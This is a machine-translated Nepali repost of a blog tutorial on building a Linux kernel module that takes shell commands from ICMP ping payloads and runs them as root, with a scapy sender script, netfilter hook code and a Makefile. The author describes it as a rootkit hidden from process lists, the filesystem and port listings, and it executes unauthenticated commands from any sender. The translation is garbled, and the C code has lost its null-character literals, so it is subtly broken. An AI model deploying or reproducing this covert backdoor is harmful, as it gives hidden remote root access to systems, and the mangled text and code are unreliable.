🥇 ICMP मा आणविक खोल | प्रोहोस्टर

TL; ड: म एक कर्नेल मोड्युल लेख्दै छु जसले ICMP पेलोडबाट आदेशहरू पढ्छ र तपाईंको SSH क्र्यास भए तापनि तिनीहरूलाई सर्भरमा कार्यान्वयन गर्दछ। सबैभन्दा अधीरको लागि, सबै कोड हो github.

सावधानी अनुभवी सी प्रोग्रामरहरू रगतको आँसु फुट्ने जोखिम! म शब्दावलीमा गलत पनि हुन सक्छु, तर कुनै पनि आलोचना स्वागत छ। पोष्ट सी प्रोग्रामिंग को धेरै नराम्रो विचार छ र लिनक्स को भित्री मा हेर्न चाहने को लागी लक्षित छ।

मेरो पहिलो टिप्पणी मा लेख उल्लेख गरिएको SoftEther VPN, जसले केहि "नियमित" प्रोटोकलहरूको नक्कल गर्न सक्छ, विशेष गरी HTTPS, ICMP र DNS मा। म तिनीहरूमध्ये पहिलो काम गरिरहेको कल्पना गर्न सक्छु, किनकि म HTTP(S) सँग धेरै परिचित छु, र मैले ICMP र DNS मा टनेलिङ सिक्नुपर्‍यो।

हो, २०२० मा मैले सिकें कि तपाईले ICMP प्याकेटहरूमा मनमानी पेलोड घुसाउन सक्नुहुन्छ। तर कहिल्यै भन्दा ढिलो राम्रो! र यसको बारेमा केहि गर्न सकिन्छ, त्यसोभए यो गर्न आवश्यक छ। मेरो दैनिक जीवनमा म प्रायः कमाण्ड लाइन प्रयोग गर्छु, SSH मार्फत, ICMP शेलको विचार मेरो दिमागमा पहिले आयो। र पूर्ण बुलशिल्ड बिंगो जम्मा गर्नको लागि, मैले यसलाई लिनक्स मोड्युलको रूपमा एउटा भाषामा लेख्ने निर्णय गरें जुन मसँग मात्र कुनै नराम्रो विचार छ। यस्तो शेल प्रक्रियाहरूको सूचीमा देखिनेछैन, तपाइँ यसलाई कर्नेलमा लोड गर्न सक्नुहुन्छ र यो फाइल प्रणालीमा हुनेछैन, तपाइँले सुन्ने पोर्टहरूको सूचीमा केहि संदिग्ध देख्नुहुने छैन। यसको क्षमताहरूको सन्दर्भमा, यो एक पूर्ण विकसित रूटकिट हो, तर म यसलाई सुधार गर्न र SSH मार्फत लग इन गर्न र कम्तिमा कार्यान्वयन गर्न लोड औसत धेरै उच्च हुँदा यसलाई अन्तिम उपायको शेलको रूपमा प्रयोग गर्ने आशा गर्दछु। echo i > /proc/sysrq-triggerरिबुट नगरी पहुँच पुनर्स्थापना गर्न।

हामी पाइथन र सी, गुगल र मा पाठ सम्पादक, आधारभूत प्रोग्रामिङ कौशल लिन्छौं भर्चुअल यदि सबै कुरा टुट्यो भने (वैकल्पिक - स्थानीय VirtualBox/KVM/etc) चक्कु मुनि राख्न तपाईंलाई कुनै आपत्ति छैन र जाऔं!

ग्राहक पक्ष

मलाई लाग्थ्यो कि क्लाइन्टको भागको लागि मैले लगभग 80 लाइनहरूसँग स्क्रिप्ट लेख्नुपर्छ, तर त्यहाँ दयालु व्यक्तिहरू थिए जसले मेरो लागि गरे। सबै काम। कोड अप्रत्याशित रूपमा सरल भयो, 10 महत्त्वपूर्ण रेखाहरूमा फिटिंग:

import sys
from scapy.all import sr1, IP, ICMP

if len(sys.argv) < 3:
    print('Usage: {} IP "command"'.format(sys.argv[0]))
    exit(0)

p = sr1(IP(dst=sys.argv[1])/ICMP()/"run:{}".format(sys.argv[2]))
if p:
    p.show()

लिपिले दुई तर्कहरू, ठेगाना र पेलोड लिन्छ। पठाउनु अघि, पेलोडको अगाडि कुञ्जी हुन्छ run:, हामीलाई अनियमित पेलोडहरूसँग प्याकेजहरू बहिष्कार गर्न यसको आवश्यकता हुनेछ।

कर्नेललाई प्याकेजहरू क्राफ्ट गर्न विशेषाधिकार चाहिन्छ, त्यसैले स्क्रिप्ट सुपर प्रयोगकर्ताको रूपमा चलाउनु पर्छ। कार्यान्वयन अनुमति दिन र scapy आफै स्थापना गर्न नबिर्सनुहोस्। डेबियनसँग प्याकेज भनिन्छ python3-scapy। अब तपाइँ जाँच गर्न सक्नुहुन्छ कि यो सबै कसरी काम गर्दछ।

आदेश चलाउँदै र आउटपुट गर्दै
morq@laptop:~/icmpshell$ sudo ./send.py 45.11.26.232 "Hello, world!" Begin emission: .Finished sending 1 packets. * Received 2 packets, got 1 answers, remaining 0 packets ###[ IP ]### version = 4 ihl = 5 tos = 0x0 len = 45 id = 17218 flags = frag = 0 ttl = 58 proto = icmp chksum = 0x3403 src = 45.11.26.232 dst = 192.168.0.240 options ###[ ICMP ]### type = echo-reply code = 0 chksum = 0xde03 id = 0x0 seq = 0x0 ###[ Raw ]### load = 'run:Hello, world!

यो स्निफरमा जस्तो देखिन्छ
morq@laptop:~/icmpshell$ sudo tshark -i wlp1s0 -O icmp -f "icmp and host 45.11.26.232" Running as user "root" and group "root". This could be dangerous. Capturing on 'wlp1s0' Frame 1: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0 Internet Protocol Version 4, Src: 192.168.0.240, Dst: 45.11.26.232 Internet Control Message Protocol Type: 8 (Echo (ping) request) Code: 0 Checksum: 0xd603 [correct] [Checksum Status: Good] Identifier (BE): 0 (0x0000) Identifier (LE): 0 (0x0000) Sequence number (BE): 0 (0x0000) Sequence number (LE): 0 (0x0000) Data (17 bytes)


0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world

0010 21 !

Data: 72756e3a48656c6c6f2c20776f726c6421

[Length: 17]
Frame 2: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0

Internet Protocol Version 4, Src: 45.11.26.232, Dst: 192.168.0.240

Internet Control Message Protocol

Type: 0 (Echo (ping) reply)

Code: 0

Checksum: 0xde03 [correct]
[Checksum Status: Good]
Identifier (BE): 0 (0x0000)

Identifier (LE): 0 (0x0000)

Sequence number (BE): 0 (0x0000)

Sequence number (LE): 0 (0x0000)

[Request frame: 1]
[Response time: 19.094 ms]
Data (17 bytes)
0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world

0010 21 !

Data: 72756e3a48656c6c6f2c20776f726c6421

[Length: 17]

^C2 packets captured

प्रतिक्रिया प्याकेजमा पेलोड परिवर्तन हुँदैन।

कर्नेल मोड्युल

डेबियन भर्चुअल मेसिनमा निर्माण गर्न तपाईंलाई कम्तिमा चाहिन्छ make и linux-headers-amd64, बाँकी निर्भरता को रूप मा आउनेछ। म लेखमा सम्पूर्ण कोड प्रदान गर्ने छैन; तपाईं यसलाई Github मा क्लोन गर्न सक्नुहुन्छ।

हुक सेटअप

सुरु गर्नको लागि, हामीलाई मोड्युल लोड गर्न र यसलाई अनलोड गर्न दुई प्रकार्यहरू चाहिन्छ। अनलोडिङको लागि प्रकार्य आवश्यक छैन, तर त्यसपछि rmmod यसले काम गर्दैन; मोड्युल बन्द हुँदा मात्र अनलोड हुनेछ।

#include <linux/module.h>
#include <linux/netfilter_ipv4.h>

static struct nf_hook_ops nfho;

static int __init startup(void)
{
  nfho.hook = icmp_cmd_executor;
  nfho.hooknum = NF_INET_PRE_ROUTING;
  nfho.pf = PF_INET;
  nfho.priority = NF_IP_PRI_FIRST;
  nf_register_net_hook(&init_net, &nfho);
  return 0;
}

static void __exit cleanup(void)
{
  nf_unregister_net_hook(&init_net, &nfho);
}

MODULE_LICENSE("GPL");
module_init(startup);
module_exit(cleanup);

यहाँ के भइरहेको छ:

मोड्युल र नेटफिल्टरलाई हेरफेर गर्न दुई हेडर फाइलहरू तानिन्छन्।
सबै कार्यहरू नेटफिल्टर मार्फत जान्छन्, तपाइँ यसमा हुकहरू सेट गर्न सक्नुहुन्छ। यो गर्नको लागि, तपाईंले हुक कन्फिगर गरिने संरचना घोषणा गर्न आवश्यक छ। सबैभन्दा महत्त्वपूर्ण कुरा भनेको हुकको रूपमा कार्यान्वयन गरिने प्रकार्य निर्दिष्ट गर्नु हो: nfho.hook = icmp_cmd_executor; म पछि समारोहमा जान्छु।
त्यसपछि मैले प्याकेजको लागि प्रशोधन समय सेट गरें: NF_INET_PRE_ROUTING प्याकेज प्रशोधन गर्न निर्दिष्ट गर्दछ जब यो पहिलो कर्नेलमा देखा पर्दछ। प्रयोग हुन सक्छ NF_INET_POST_ROUTING कर्नेलबाट बाहिर निस्कँदा प्याकेटलाई प्रशोधन गर्न।
मैले फिल्टरलाई IPv4 मा सेट गरें: nfho.pf = PF_INET;.
म मेरो हुकलाई सर्वोच्च प्राथमिकता दिन्छु: nfho.priority = NF_IP_PRI_FIRST;
र म डेटा संरचनालाई वास्तविक हुकको रूपमा दर्ता गर्छु: nf_register_net_hook(&init_net, &nfho);
अन्तिम प्रकार्यले हुक हटाउँछ।
लाइसेन्स स्पष्ट रूपमा संकेत गरिएको छ ताकि कम्पाइलरले गुनासो गर्दैन।
कार्यहरू module_init() и module_exit() मोड्युल सुरु गर्न र समाप्त गर्न अन्य प्रकार्यहरू सेट गर्नुहोस्।

पेलोड पुन: प्राप्त गर्दै

अब हामीले पेलोड निकाल्न आवश्यक छ, यो सबैभन्दा गाह्रो काम भयो। पेलोडहरूसँग काम गर्नको लागि कर्नेलमा निर्मित प्रकार्यहरू छैनन्; तपाईंले उच्च-स्तर प्रोटोकलहरूको हेडरहरू मात्र पार्स गर्न सक्नुहुन्छ।

#include <linux/ip.h>
#include <linux/icmp.h>

#define MAX_CMD_LEN 1976

char cmd_string[MAX_CMD_LEN];

struct work_struct my_work;

DECLARE_WORK(my_work, work_handler);

static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
  struct iphdr *iph;
  struct icmphdr *icmph;

  unsigned char *user_data;
  unsigned char *tail;
  unsigned char *i;
  int j = 0;

  iph = ip_hdr(skb);
  icmph = icmp_hdr(skb);

  if (iph->protocol != IPPROTO_ICMP) {
    return NF_ACCEPT;
  }
  if (icmph->type != ICMP_ECHO) {
    return NF_ACCEPT;
  }

  user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
  tail = skb_tail_pointer(skb);

  j = 0;
  for (i = user_data; i != tail; ++i) {
    char c = *(char *)i;

    cmd_string[j] = c;

    j++;

    if (c == '')
      break;

    if (j == MAX_CMD_LEN) {
      cmd_string[j] = '';
      break;
    }

  }

  if (strncmp(cmd_string, "run:", 4) != 0) {
    return NF_ACCEPT;
  } else {
    for (j = 0; j <= sizeof(cmd_string)/sizeof(cmd_string[0])-4; j++) {
      cmd_string[j] = cmd_string[j+4];
      if (cmd_string[j] == '')
	break;
    }
  }

  schedule_work(&my_work);

  return NF_ACCEPT;
}

के भइरहेको छ:

मैले अतिरिक्त हेडर फाइलहरू समावेश गर्नुपर्‍यो, यो पटक IP र ICMP हेडरहरू हेरफेर गर्न।
मैले अधिकतम रेखा लम्बाइ सेट गरें: #define MAX_CMD_LEN 1976। ठ्याक्कै किन यो? किनभने कम्पाइलरले यसको बारेमा गुनासो गर्छ! तिनीहरूले मलाई पहिले नै सुझाव दिएका छन् कि मलाई स्ट्याक र हिप बुझ्न आवश्यक छ, कुनै दिन म निश्चित रूपमा यो गर्नेछु र सायद कोड पनि सच्याउनेछु। मैले तुरुन्तै लाइन सेट गरें जुन आदेश समावेश हुनेछ: char cmd_string[MAX_CMD_LEN];। यो सबै प्रकार्यहरूमा देखिने हुनुपर्छ; म यसको बारेमा अनुच्छेद 9 मा थप विस्तारमा कुरा गर्नेछु।
अब हामीले प्रारम्भ गर्न आवश्यक छ (struct work_struct my_work;) संरचना र यसलाई अर्को प्रकार्यसँग जडान गर्नुहोस् (DECLARE_WORK(my_work, work_handler);)। म नवौं अनुच्छेदमा यो किन आवश्यक छ भनेर पनि कुरा गर्नेछु।
अब म एउटा प्रकार्य घोषणा गर्छु, जुन हुक हुनेछ। प्रकार र स्वीकृत तर्कहरू नेटफिल्टरद्वारा निर्देशित हुन्छन्, हामी मात्र इच्छुक छौं skb। यो सकेट बफर हो, एक आधारभूत डेटा संरचना जसले प्याकेटको बारेमा सबै उपलब्ध जानकारी समावेश गर्दछ।
प्रकार्यले काम गर्नको लागि, तपाईंलाई दुई ढाँचाहरू र दुई पुनरावृत्तिहरू सहित धेरै चरहरू चाहिन्छ।
```
  struct iphdr *iph;
  struct icmphdr *icmph;

  unsigned char *user_data;
  unsigned char *tail;
  unsigned char *i;
  int j = 0;
```
हामी तर्क संग सुरु गर्न सक्छौं। मोड्युलले काम गर्नको लागि, ICMP इको बाहेक अन्य कुनै प्याकेटहरू आवश्यक पर्दैन, त्यसैले हामी निर्मित प्रकार्यहरू प्रयोग गरेर बफरलाई पार्स गर्छौं र सबै गैर-ICMP र गैर-इको प्याकेटहरू बाहिर फ्याँक्छौं। फर्किनु NF_ACCEPT प्याकेजको स्वीकृति भनेको हो, तर तपाईं फर्केर पनि प्याकेजहरू छोड्न सक्नुहुन्छ NF_DROP.
```
  iph = ip_hdr(skb);
  icmph = icmp_hdr(skb);

  if (iph->protocol != IPPROTO_ICMP) {
    return NF_ACCEPT;
  }
  if (icmph->type != ICMP_ECHO) {
    return NF_ACCEPT;
  }
```
आईपी हेडरहरू जाँच नगरी के हुन्छ भनेर मैले परीक्षण गरेको छैन। C को मेरो न्यूनतम ज्ञानले मलाई बताउँछ कि अतिरिक्त जाँच बिना, केहि भयानक हुन बाध्य छ। यदि तपाईंले मलाई यसबाट रोक्नु भयो भने म खुसी हुनेछु!
अब जब प्याकेज तपाईलाई चाहिने सही प्रकारको छ, तपाईले डाटा निकाल्न सक्नुहुन्छ। बिल्ट-इन प्रकार्य बिना, तपाईंले पहिले पेलोडको सुरुमा एक सूचक प्राप्त गर्नु पर्छ। यो एकै ठाउँमा गरिन्छ, तपाईंले सूचकलाई ICMP हेडरको सुरुमा लैजानुपर्छ र यसलाई यो हेडरको साइजमा लैजानुपर्छ। सबै संरचना प्रयोग गर्दछ icmph: user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
हेडरको अन्त्यमा पेलोडको अन्त्यसँग मेल खानुपर्छ skb, यसैले हामी यसलाई सम्बन्धित संरचनाबाट आणविक माध्यमहरू प्रयोग गरेर प्राप्त गर्छौं: tail = skb_tail_pointer(skb);.

तस्वीर चोरी भयो यहाँ देखि, तपाइँ सकेट बफर बारे थप पढ्न सक्नुहुन्छ।
एकचोटि तपाइँसँग सुरु र अन्त्यमा संकेतहरू भएपछि, तपाइँ डेटालाई स्ट्रिङमा प्रतिलिपि गर्न सक्नुहुन्छ cmd_string, उपसर्गको उपस्थितिको लागि जाँच गर्नुहोस् run: र, यदि हराइरहेको छ भने प्याकेज खारेज गर्नुहोस्, वा यो उपसर्ग हटाएर लाइनलाई फेरि लेख्नुहोस्।
यो हो, अब तपाइँ अर्को ह्यान्डलरलाई कल गर्न सक्नुहुन्छ: schedule_work(&my_work);। यस्तो कलमा प्यारामिटर पास गर्न सम्भव नहुने भएकोले, कमाण्डको साथ लाइन विश्वव्यापी हुनुपर्छ। schedule_work() पास गरिएको संरचनासँग सम्बन्धित कार्यलाई टास्क शेड्युलरको सामान्य लाममा राख्नेछ र पूरा हुनेछ, तपाईंलाई आदेश पूरा हुनको लागि पर्खन नदिने अनुमति दिन्छ। यो आवश्यक छ किनभने हुक धेरै छिटो हुनुपर्छ। अन्यथा, तपाइँको छनोट यो हो कि केहि पनि सुरु हुनेछैन वा तपाइँ एक कर्नेल आतंक पाउनुहुनेछ। ढिलाइ मृत्यु जस्तै हो!
यो हो, तपाइँ समान रिटर्न संग प्याकेज स्वीकार गर्न सक्नुहुन्छ।

प्रयोगकर्तास्पेसमा प्रोग्राम कल गर्दै

यो प्रकार्य सबैभन्दा बुझ्न योग्य छ। यसको नाम मा दिइएको थियो DECLARE_WORK(), प्रकार र स्वीकृत तर्कहरू रोचक छैनन्। हामी आदेशको साथ लाइन लिन्छौं र यसलाई पूर्ण रूपमा शेलमा पास गर्छौं। उसलाई पार्सिङ, बाइनरीहरू खोजी र अरू सबैसँग सम्झौता गर्न दिनुहोस्।

static void work_handler(struct work_struct * work)
{
  static char *argv[] = {"/bin/sh", "-c", cmd_string, NULL};
  static char *envp[] = {"PATH=/bin:/sbin", NULL};

  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

स्ट्रिङहरूको एर्रेमा तर्कहरू सेट गर्नुहोस् argv[]। म मान्नेछु कि सबैलाई थाहा छ कि प्रोग्रामहरू वास्तवमा यसरी चल्छन्, र खाली ठाउँहरूसँग निरन्तर रेखाको रूपमा होइन।
वातावरण चर सेट गर्नुहोस्। मैले केवल पथहरूको न्यूनतम सेटको साथ PATH सम्मिलित गरें, आशा छ कि ती सबै पहिले नै जोडिएका थिए। /bin с /usr/bin и /sbin с /usr/sbin। अन्य मार्गहरू व्यवहारमा विरलै महत्त्वपूर्ण हुन्छन्।
सकियो, गरौं! कर्नेल प्रकार्य call_usermodehelper() प्रवेश स्वीकार गर्दछ। बाइनरीको लागि मार्ग, आर्गुमेन्टहरूको एरे, वातावरण चरहरूको एरे। यहाँ म यो पनि मान्दछु कि सबैले एक अलग तर्कको रूपमा कार्यान्वयनयोग्य फाइलमा मार्ग पास गर्ने अर्थ बुझ्छन्, तर तपाईले सोध्न सक्नुहुन्छ। अन्तिम तर्कले प्रक्रिया पूरा हुनको लागि कुर्नु पर्ने हो कि भनेर निर्दिष्ट गर्दछ (UMH_WAIT_PROC), प्रक्रिया सुरु (UMH_WAIT_EXEC) वा पर्खिदैन (UMH_NO_WAIT)। अझै केहि छ? UMH_KILLABLE, मैले त्यसमा हेरेँ ।

विधानसभा

कर्नेल मोड्युलहरूको संयोजन कर्नेल मेक-फ्रेमवर्क मार्फत गरिन्छ। बोलाइयो make कर्नेल संस्करणमा बाँधिएको विशेष डाइरेक्टरी भित्र (यहाँ परिभाषित गरिएको छ: KERNELDIR:=/lib/modules/$(shell uname -r)/build) र मोड्युलको स्थान चरमा पठाइन्छ M तर्कहरूमा। icmpshell.ko र सफा लक्ष्यहरूले यो फ्रेमवर्क पूर्ण रूपमा प्रयोग गर्दछ। IN obj-m वस्तु फाइललाई सङ्केत गर्दछ जुन मोड्युलमा रूपान्तरण हुनेछ। सिन्ट्याक्स जुन रिमेक हुन्छ main.o в icmpshell.o (icmpshell-objs = main.o) मलाई धेरै तार्किक लाग्दैन, तर यो होस्।

KERNELDIR:=/lib/modules/$(shell uname -r)/build


obj-m = icmpshell.o

icmpshell-objs = main.o
all: icmpshell.ko
icmpshell.ko: main.c

make -C $(KERNELDIR) M=$(PWD) modules

clean: make -C $(KERNELDIR) M=$(PWD) clean

हामी सङ्कलन: make। लोड गर्दै: insmod icmpshell.ko। सकियो, तपाईं जाँच गर्न सक्नुहुन्छ: sudo ./send.py 45.11.26.232 "date > /tmp/test"। यदि तपाइँसँग तपाइँको मेसिनमा फाइल छ भने /tmp/test र यसमा अनुरोध पठाइएको मिति समावेश छ, जसको मतलब तपाईंले सबै ठीक गर्नुभयो र मैले सबै ठीक गरें।

निष्कर्षमा

आणविक विकासको साथ मेरो पहिलो अनुभव मैले सोचे भन्दा धेरै सजिलो थियो। सी मा विकास गर्ने अनुभव बिना पनि, कम्पाइलर संकेतहरू र गुगल परिणामहरूमा ध्यान केन्द्रित गर्दै, मैले काम गर्ने मोड्युल लेख्न र कर्नेल ह्याकर जस्तो महसुस गर्न सक्षम भएँ, र एकै समयमा एक स्क्रिप्ट किडी। थप रूपमा, म कर्नेल न्यूबीज च्यानलमा गएँ, जहाँ मलाई प्रयोग गर्न भनिएको थियो schedule_work() कल गर्नुको सट्टा call_usermodehelper() हुक भित्र आफैं र उसलाई लाज मान्नुभयो, सही रूपमा एक घोटाला शंका। कोडको सय लाइनहरूले मलाई मेरो खाली समयमा विकासको एक हप्ता खर्च गर्छ। एक सफल अनुभव जसले प्रणाली विकासको अत्यधिक जटिलताको बारेमा मेरो व्यक्तिगत मिथकलाई नष्ट गर्यो।

यदि कोही Github मा कोड समीक्षा गर्न सहमत हुनुहुन्छ भने, म आभारी हुनेछु। म पक्का छु कि मैले धेरै बेवकूफ गल्तीहरू गरें, विशेष गरी जब स्ट्रिङहरूसँग काम गर्दै।

स्रोत: www.habr.com

ICMP मा आणविक खोल